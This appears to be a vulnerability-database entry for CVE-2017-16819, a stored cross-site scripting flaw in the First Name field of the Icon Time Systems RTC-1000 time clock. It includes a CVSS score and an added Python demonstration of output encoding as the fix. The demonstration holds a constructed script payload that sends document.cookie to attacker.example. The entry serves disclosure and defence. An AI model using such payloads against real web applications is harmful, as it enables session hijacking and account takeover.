Exploitation Summary
EIP tracks 1 public exploit for CVE-2017-16819. The PoC was published by Keith Thome.
AI-analyzed exploit summary: This is a writeup detailing a stored XSS vulnerability in Icon Time Systems RTC-1000 firmware <= v2.5.7458. The vulnerability allows an attacker with valid credentials (PR:L in the vector below) to inject malicious scripts into the 'First Name' field of an employee record; the payload is stored with the record and executes whenever that name is displayed on other pages of the web interface.
Description
A stored cross-site scripting vulnerability in the Icon Time Systems RTC-1000 v2.5.7458 and earlier time clock allows remote authenticated attackers to inject arbitrary JavaScript into the nameFirst (aka First Name) field on the employee details page (/employee.html). The stored value is then rendered, without output encoding, in multiple pages where that field's data is used, so the script runs in the browser of any user who views one of those pages. This allows session hijacking and possible elevation of privileges when a higher-privileged user (for example an administrator reviewing timecards) views the injected record.
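The mechanism above (one stored field, many rendering points) is easy to get wrong by fixing only the page where the value was entered. The following Python example is added here to illustrate it; it is not code from the RTC-1000 firmware or from the published writeup. The page templates, the in-memory employee store and the payload are all constructed for the demonstration (the real device's templates are not on this page); the hardened variant applies html.escape at every output point and an audit function reports which pages still render a live script tag.

```python
import html
import re

# Constructed stored-XSS payload in the style of the writeup (not taken from it).
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'

# Hypothetical templates for the pages that display nameFirst. Real RTC-1000
# pages are not reproduced here; these stand in for "multiple pages where that
# field data is utilized". Note the different contexts: attribute value,
# table cell, heading text.
PAGES = {
    "employee.html": "<input name='nameFirst' value='{name}'>",
    "timecards.html": "<tr><td>{name}</td><td>40.0</td></tr>",
    "report.html": "<h2>Hours for {name}</h2>",
}

# Hypothetical in-memory store: the form handler saves the field verbatim,
# which is what makes the XSS *stored* rather than reflected.
EMPLOYEES = {}


def save_employee(emp_id, name_first):
    """Persist the First Name exactly as submitted (no input filtering)."""
    EMPLOYEES[emp_id] = {"nameFirst": name_first}


def render(template, emp_id, escape):
    """Render one page. escape=False is the vulnerable behaviour; escape=True
    applies HTML entity encoding (quote=True also covers attribute context)."""
    value = EMPLOYEES[emp_id]["nameFirst"]
    if escape:
        value = html.escape(value, quote=True)
    return template.format(name=value)


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def audit(pages, emp_id, escape):
    """Return the names of pages in which an unencoded <script> tag survives
    rendering, i.e. where the stored payload would execute in a viewer's browser."""
    return sorted(
        name for name, tmpl in pages.items()
        if SCRIPT_TAG.search(render(tmpl, emp_id, escape))
    )


if __name__ == "__main__":
    save_employee(1, PAYLOAD)
    print("vulnerable pages:", audit(PAGES, 1, escape=False))
    print("after output encoding:", audit(PAGES, 1, escape=True))
```

Escaping at the output point, per rendering context, is the fix that survives new pages being added later; sanitizing only the input form leaves every other consumer of the stored value (reports, exports, other UIs) exposed.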
Exploits (1)
Stored XSS writeup by Keith Thome (summarized above): authenticated injection into the First Name field of an employee record, executing wherever the name is displayed.
References (2)
Scores
CVSS v3.0 base score 5.4 (Medium)
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N